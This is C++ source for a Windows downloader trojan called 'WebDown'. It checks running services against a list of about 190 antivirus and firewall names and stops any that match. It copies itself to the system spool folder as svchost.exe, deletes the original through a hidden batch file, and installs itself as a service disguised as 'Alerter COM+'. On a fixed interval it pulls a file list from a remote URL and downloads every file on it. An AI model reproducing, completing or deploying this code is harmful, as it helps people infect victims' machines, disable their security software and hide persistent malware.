// WebDown.cpp : Defines the entry point for the console application. #include "stdafx.h" #include "WebDown.h" #include "winsvc.h" #include "winsock2.h" #pragma comment(lib,"ws2_32.lib") #include "time.h" #include "urlmon.h" #pragma comment(lib,"urlmon.lib") #include <tlhelp32.h> / struct MODIFY_DATA { char DownFile[128];//下载文件列表 int WaitTime;//巡查时间(分钟) }modify_data = { "http://www.baidu.com/tmp.txt", 60,//间隔检测时间xx分钟 }; HWND hWnd; char DownFileDate1[9]="00-00-00"; char DownFileDate2[9]="00-00-00"; SERVICE_STATUS service_status_ss; SERVICE_STATUS_HANDLE handle_service_status; SC_HANDLE scm,svc; char test[128]; char AntiServ[193][18] ={ "ACKWIN32", "ADVXDWIN", "ALERTSVC", "ALOGSERV", "AMON9X", "ANTI-TROJAN", "ANTS", "apvxdwin", "ATCON", "ATUpdateR", "ATWATCH", "AUTODOWN", "AutoTrace", "AVCONSOL", "AVGCC32", "AVGCTRL", "Avgctrl", "AVGSERV", "AvgServ", "AVGSERV9", "AVGW", "avkpop", "AVKSERV", "avkservice", "avkwctl9", "AVP32", "AVP32", "AVPCC", "AVPCC", "AVPM", "AVPM", "Avsched32", "AVSYNMGR", "AvSynMgr", "AVWINNT", "AVXMONITOR9X", "AVXMONITORNT", "AVXQUAR", "AVXW", "BLACKD", "BLACKICE", "BlackICE", "CLAW95", "CLAW95CF", "CLEANER", "CLEANER3", "CMGRDIAN", "CONNECTIONMONITOR", "defscangui", "DEFWATCH", "DOORS", "DVP95", "EFPEADM", "ETRUSTCIPE", "EVPN", "EXPERT", "fameh32", "fch32", "fih32", "fnrb32", "fsaa", "fsav32", "fsgk32", "fsm32", "fsma32", "fsmb32", "gbmenu", "GENERICS", "GUARD", "GUARDDOG", "HELP", "IAMAPP", "IAMSERV", "ICLOAD95", "ICLOADNT", "ICMON", "ICSUPP95", "ICSUPPNT", "IFACE", "IOMON98", "ISRV95", "JEDI", "LDNETMON", "LDPROMENU", "LDSCAN", "LOCKDOWN", "LOCKDOWN2000", "LUALL", "LUCOMSERVER", "MCAGENT", "MCMNHDLR", "MCSHIELD", "McShield", "MCTOOL", "MCUpdate", "MCVSRTE", "MCVSSHLD", "MGAVRTCL", "MGAVRTE", "MGHTML", "minilog", "MONITOR", "MOOLIVE", "MWATCH", "NAVAP", "navapsvc", "NAVAPW32", "NAVENG", "NAVEX15", "NAVLU32", "NAVW32", "NAVWNT", "NDD32", "NeoWatchLog", "NETUTILS", "ngdbserv", "NGServer", "NISSERV", "NISSERV", "NISUM", "NISUM", "NMAIN", "NORMIST", "NPROTECT", "NPSSVC", "NSCHED32", "ntrtscan", "NTVDM", "NTXconfig", "NVC95", //"NVSVC32", "NWService", "NWTOOL16", "PADMIN", "pavproxy", "PCCIOMON", "pccntmon", "pccwin97", "PCCWIN98", "pcscan", "PERSFW", "POP3TRAP", "POPROXY", "PORTMONITOR", "PROCESSMONITOR", "PROGRAMAUDITOR", "PROT95", "PVIEW95", "RAV7", "RAV7WIN", "REALMON", "RESCUE", "RTVSCN95", "sbserv", "SCAN32", "SCRSCAN", "sharedaccess", "SPHINX", "SPYXX", "SS3EDIT", "STOPW", "SVW3", "SWEEP95", "SweepNet", "SWEEPSRV", "SWEEPSRV.SYS", "SweepUpdate", "SWNETSUP", "SymProxySvc", "SYMTRAY", "TFAK", "vbcmserv", "VbCons", "VET32", "VET95", "VETTRAY", "VPC32", "VPTRAY", "VSCHED", "VSECOMR", "VSHWIN32", "VSMAIN", "vsmon", "VSMON", //"VSSTAT", "WATCHDOG", "WEBSCANX", "WGFE95", "WIMMUN32", "WRADMIN", "WRCTRL", "ZAPROMINILOG", "ZONEALARM" }; //==================================================================== void KillProcess(char * processName) { HANDLE hSnapshot; hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 pe; Process32First(hSnapshot,&pe); do { CString KillProcessName = processName; if(KillProcessName.CompareNoCase(pe.szExeFile) == 0) { HANDLE hProcess; hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID); if(hProcess) { TerminateProcess(hProcess,0);//关闭进程 } } } while(Process32Next(hSnapshot,&pe)); CloseHandle(hSnapshot); } // //终止服务 void StopServices(char * SvrName) { CString name = SvrName;//变量转移 SC_HANDLE scm; SC_HANDLE service; SERVICE_STATUS status; if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL) { //printf("OpenSCManager Error/n"); return; } service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE); if (!service) { //printf("OpenService error!/n"); return; } BOOL isSuccess=QueryServiceStatus(service,&status); if (!isSuccess) { //printf("QueryServiceStatus error!/n"); return; } if ( status.dwCurrentState!=SERVICE_STOPPED ) { isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status); //if (!isSuccess ) // printf("服务停止失败!/n"); //else // printf("服务停止成功!/n"); Sleep( 500 ); }else { //printf("此服务没有运行!/n"); } } BOOL DisplayServices() { LPENUM_SERVICE_STATUS lpServices = NULL; DWORD nSize = 0; DWORD nServicesReturned; DWORD nResumeHandle = 0; DWORD dwServiceType = SERVICE_WIN32; SC_HANDLE schSCManager = NULL; BOOL Flag = FALSE; DWORD i = 0; UINT j = 0; schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) // Fail To Open SCM { //printf("Fail To Open SCM/n"); return FALSE; } lpServices = (LPENUM_SERVICE_STATUS) LocalAlloc(LPTR, 64 * 1024); // Allocate Ram if (lpServices == NULL) // Fail To Allocate Ram { //printf("Fail To Allocate Ram/n"); goto CleanUP; } // Enum All Service Based On Service Type if (EnumServicesStatus(schSCManager, dwServiceType, SERVICE_STATE_ALL, (LPENUM_SERVICE_STATUS)lpServices, 64 * 1024, &nSize, &nServicesReturned, &nResumeHandle) == NULL) { //printf("Fail To Enum Service/n"); goto CleanUP; } // Display The Services //这里进行服务名称对比,如果是则终止 //printf("%-34s%s/n/n","ServiceName","DisplayName"); for (i = 0; i < nServicesReturned; i++) { //printf("%s/n",lpServices[i].lpServiceName); //从中进行匹配 for(int j = 0 ; j < 190;j++) { if(!_strnicmp(lpServices[i].lpServiceName,AntiServ[j],strlen(lpServices[i].lpServiceName))) { //printf("FindServer:%s/n",lpServices[i].lpServiceName); if (lpServices[i].ServiceStatus.dwCurrentState == SERVICE_RUNNING) { //printf("STOPServer:%s/n",lpServices[i].lpServiceName); StopServices(lpServices[i].lpServiceName); } } } } Flag = TRUE; // Close Service Handle,Free Allocated Ram And Return To The Caller CleanUP: CloseServiceHandle(schSCManager); if (lpServices != NULL) { LocalFree(lpServices); } getchar (); return Flag; } // unsigned long CALLBACK DOWN_thread(LPVOID dParam) { while(1) { //MessageBox(NULL,"STOP SERVER","TODO",MB_OK); ///先对服务进行一次扫描检测,如果有不对的就停止。只针对WIN32 DisplayServices(); if(GetDownFileDate(modify_data.DownFile,DownFileDate2))//将要下载列表文件的时间存于Date2 { if (strncmp(DownFileDate1,DownFileDate2,8)!=0)//下载列表时间不一样 {//表示需要下载文件 DownFiles(modify_data.DownFile);//下载文件列表中所有文件 //DownExec(modify_data.DownFile);//下载文件 strcpy(DownFileDate1,DownFileDate2); } } Sleep(modify_data.WaitTime*60*1000);//分钟一次 } return 0; } //***********************************************//自删除 void uninstall(void)//Thanks to Spybot { char batfile[MAX_PATH]; char tempdir[MAX_PATH]; char tcmdline[MAX_PATH]; char cmdline[MAX_PATH]; char This_File[MAX_PATH]; HANDLE f; DWORD r; PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; GetTempPath(sizeof(tempdir), tempdir); sprintf(batfile, "%s//rs.bat", tempdir); f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); if (f != INVALID_HANDLE_VALUE) { WriteFile(f,"@echo off/r/n" ":kill/r/n" "attrib -a -r -s -h /"%1/"/r/n" "del /F /"%1/"/r/n" "if exist /"%1/" goto kill/r/n" "del /F /"%0/"/r/n" ,94, &r,NULL ); CloseHandle(f); memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE; memset(This_File,0,sizeof(This_File)); GetModuleFileName(NULL, This_File, sizeof(This_File)); sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line // execute the batch file CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo); } } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { int nRetCode = 0; ///自复制---------------------- char SysDirBuff[256]; char filename[256]; char This_File[256]; ::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff)); strcpy(filename,SysDirBuff); strcat(filename,"//spool//svchost.exe"); GetModuleFileName(NULL, This_File, sizeof(This_File)); if (_stricmp(This_File,filename)!=0) { DeleteFile(filename); if(::CopyFile(This_File,filename,FALSE)==0) return -1; PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&pinfo,0,sizeof(pinfo)); memset(&sinfo,0,sizeof(sinfo)); CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo); uninstall(); ExitProcess(0); } //注释解密部分,单元测试需要去掉,没有加密 //DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"4321"); //服务入口表----------------------------------- SERVICE_TABLE_ENTRY service_tab_entry[2]; service_tab_entry[0].lpServiceName="Alerter COM+"; //线程名字 service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址 //可以有多个线程,最后一个必须为NULL service_tab_entry[1].lpServiceName=NULL; service_tab_entry[1].lpServiceProc=NULL; if (StartServiceCtrlDispatcher(service_tab_entry)==0)//首次运行 { InstallService(); } return nRetCode; } /***********************************************/